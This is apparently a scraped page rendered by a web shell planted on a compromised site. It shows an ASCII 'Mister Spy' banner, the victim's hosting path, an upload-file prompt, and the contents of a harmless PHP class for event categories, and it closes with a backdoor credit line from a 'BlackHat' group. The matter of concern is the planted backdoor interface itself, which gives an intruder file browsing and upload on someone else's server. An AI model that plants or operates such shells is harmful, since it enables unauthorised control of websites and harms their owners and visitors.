Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/web/library/
Upload File :
Current File : /home/caballoscriollos/public_html/web/library/class.eventocategoria.php

<?php

require_once('class.eventos.php');
require_once('class.categorias.php');
require_once('class.categoriassubrubro.php');
require_once('class.instancias.php');

class EventoCategoria
{
	public $IdEventoCategoria;
	public $IdEvento;
	public $IdCategoria;
	public $IdCategoriaSubrubro;
	public $IdInstancia;
	public $Categoria;
	
	
	public function ParseFromArray(array $arr)
	{
		$this->IdEventoCategoria	= $arr['IdEventoCategoria'];
		$this->IdEvento				= $arr['IdEvento'];
		$this->IdCategoria			= $arr['IdCategoria'];
		$this->IdCategoriaSubrubro	= $arr['IdCategoriaSubrubro'];
		$this->IdInstancia			= $arr['IdInstancia'];
		$this->Categoria 			= $this->GetCategoria();
	}

	public function GetEvento() {
		$oEventos = new Eventos();
		return $oEventos->GetById($this->IdEvento);
	}

	public function GetCategoria() {
		$oCategorias = new Categorias();
		return $oCategorias->GetById($this->IdCategoria);
	}

	public function GetCategoriaSubrubro() {
		$oCategoriasSubrubro = new CategoriasSubrubro();
		return $oCategoriasSubrubro->GetById($this->IdCategoriaSubrubro);
	}

	public function GetInstancia() {
		return Instancias::GetById($this->IdInstancia);
	}

	
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat